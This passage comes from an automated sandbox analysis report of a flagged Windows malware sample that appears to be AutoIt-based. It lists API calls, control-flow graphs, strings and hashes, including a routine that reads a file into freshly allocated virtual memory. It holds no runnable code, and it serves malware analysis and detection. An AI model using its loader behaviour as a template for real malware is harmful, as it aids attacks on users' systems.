                                                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe$CMDLINE$CMDLINERAW
                                                                        • API String ID: 3948761352-1723296348
                                                                        • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                        • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                                        • String ID: D)E$D)E$FILE
                                                                        • API String ID: 3888824918-361185794
                                                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • _wcsncat.LIBCMT ref: 0040E433
                                                                        • __wmakepath.LIBCMT ref: 0040E44F
                                                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • _wcscpy.LIBCMT ref: 0040E487
                                                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                        • _wcscat.LIBCMT ref: 00427541
                                                                        • _wcslen.LIBCMT ref: 00427551
                                                                        • _wcslen.LIBCMT ref: 00427562
                                                                        • _wcscat.LIBCMT ref: 0042757C
                                                                        • _wcsncpy.LIBCMT ref: 004275BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                        • String ID: Include$\
                                                                        • API String ID: 3173733714-3429789819
                                                                        • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                        • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _fseek.LIBCMT ref: 0045292B
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                        • __fread_nolock.LIBCMT ref: 00452961
                                                                        • __fread_nolock.LIBCMT ref: 00452971
                                                                        • __fread_nolock.LIBCMT ref: 0045298A
                                                                        • __fread_nolock.LIBCMT ref: 004529A5
                                                                        • _fseek.LIBCMT ref: 004529BF
                                                                        • _malloc.LIBCMT ref: 004529CA
                                                                        • _malloc.LIBCMT ref: 004529D6
                                                                        • __fread_nolock.LIBCMT ref: 004529E7
                                                                        • _free.LIBCMT ref: 00452A17
                                                                        • _free.LIBCMT ref: 00452A20
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1255752989-0
                                                                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                        • ImageList_ReplaceIcon.COMCTL32(00A6FF90,000000FF,00000000), ref: 00410552
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A6FF90,000000FF,00000000), ref: 00410552
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _malloc
                                                                        • String ID: Default
                                                                        • API String ID: 1579825452-753088835
                                                                        • Opcode ID: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                                                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                        • Opcode Fuzzy Hash: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                                                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1984 425d16 1982->1984 1985 40f6c8-40f6d6 1982->1985 1983->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1984 1991->1970
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                                                        • String ID: AU3!$EA06
                                                                        • API String ID: 1268643489-2658333250
                                                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2008 401193-40119a 2002->2008 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2013 42b045-42b059 call 401000 call 40e0c0 2005->2013 2011 401219-40121f 2006->2011 2012 40115d 2006->2012 2009 4011a3-4011a9 2007->2009 2010 42afb4-42afc5 call 40f190 2007->2010 2009->2001 2015 4011af 2009->2015 2010->2008 2011->2001 2018 401225-42b06d call 468b0e 2011->2018 2016 401163-401166 2012->2016 2017 42b01d-42b024 2012->2017 2013->2000 2015->2001 2022 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2015->2022 2023 4011db-401202 SetTimer RegisterWindowMessageW 2015->2023 2025 42afe9-42b018 call 40f190 call 401a50 2016->2025 2026 40116c-401172 2016->2026 2017->2000 2024 42b02a-42b033 call 4370f4 2017->2024 2018->2008 2023->2008 2032 401204-401216 CreatePopupMenu 2023->2032 2024->2000 2025->2000 2026->2001 2034 401174-42afde call 45fd57 2026->2034 2034->2000 2045 42afe4 2034->2045 2045->2008
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                        • CreatePopupMenu.USER32 ref: 00401204
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                        • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                        • std::exception::exception.LIBCMT ref: 00411626
                                                                        • std::exception::exception.LIBCMT ref: 00411640
                                                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                        • String ID: ,*H$4*H$@fI
                                                                        • API String ID: 615853336-1459471987
                                                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2065 3d99388-3d99436 call 3d96d48 2068 3d9943d-3d99463 call 3d9a298 CreateFileW 2065->2068 2071 3d9946a-3d9947a 2068->2071 2072 3d99465 2068->2072 2080 3d9947c 2071->2080 2081 3d99481-3d9949b VirtualAlloc 2071->2081 2073 3d995b5-3d995b9 2072->2073 2074 3d995fb-3d995fe 2073->2074 2075 3d995bb-3d995bf 2073->2075 2077 3d99601-3d99608 2074->2077 2078 3d995cb-3d995cf 2075->2078 2079 3d995c1-3d995c4 2075->2079 2082 3d9960a-3d99615 2077->2082 2083 3d9965d-3d99672 2077->2083 2084 3d995df-3d995e3 2078->2084 2085 3d995d1-3d995db 2078->2085 2079->2078 2080->2073 2086 3d9949d 2081->2086 2087 3d994a2-3d994b9 ReadFile 2081->2087 2088 3d99619-3d99625 2082->2088 2089 3d99617 2082->2089 2090 3d99682-3d9968a 2083->2090 2091 3d99674-3d9967f VirtualFree 2083->2091 2092 3d995f3 2084->2092 2093 3d995e5-3d995ef 2084->2093 2085->2084 2086->2073 2094 3d994bb 2087->2094 2095 3d994c0-3d99500 VirtualAlloc 2087->2095 2098 3d99639-3d99645 2088->2098 2099 3d99627-3d99637 2088->2099 2089->2083 2091->2090 2092->2074 2093->2092 2094->2073 2096 3d99502 2095->2096 2097 3d99507-3d99522 call 3d9a4e8 2095->2097 2096->2073 2105 3d9952d-3d99537 2097->2105 2102 3d99652-3d99658 2098->2102 2103 3d99647-3d99650 2098->2103 2101 3d9965b 2099->2101 2101->2077 2102->2101 2103->2101 2106 3d99539-3d99568 call 3d9a4e8 2105->2106 2107 3d9956a-3d9957e call 3d9a2f8 2105->2107 2106->2105 2113 3d99580 2107->2113 2114 3d99582-3d99586 2107->2114 2113->2073 2115 3d99588-3d9958c CloseHandle 2114->2115 2116 3d99592-3d99596 2114->2116 2115->2116 2117 3d99598-3d995a3 VirtualFree 2116->2117 2118 3d995a6-3d995af 2116->2118 2117->2118 2118->2068 2118->2073
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03D99459
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03D9967F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2130234126.0000000003D96000.00000040.00000020.00020000.00000000.sdmp, Offset: 03D96000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d96000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                        • Instruction ID: ff41213d8784ca0e5b5ddfc08ff4872e5f290c93e65a93213802839b3ecee83b
                                                                        • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                        • Instruction Fuzzy Hash: B1A11774E00208EBEF14CFA4C8A4BEEB7B5FF48704F24819AE515BB280D7759A41CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                                                                        APIs
                                                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                        • _wcsncpy.LIBCMT ref: 004102ED
                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                        • _wcsncpy.LIBCMT ref: 00410340
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
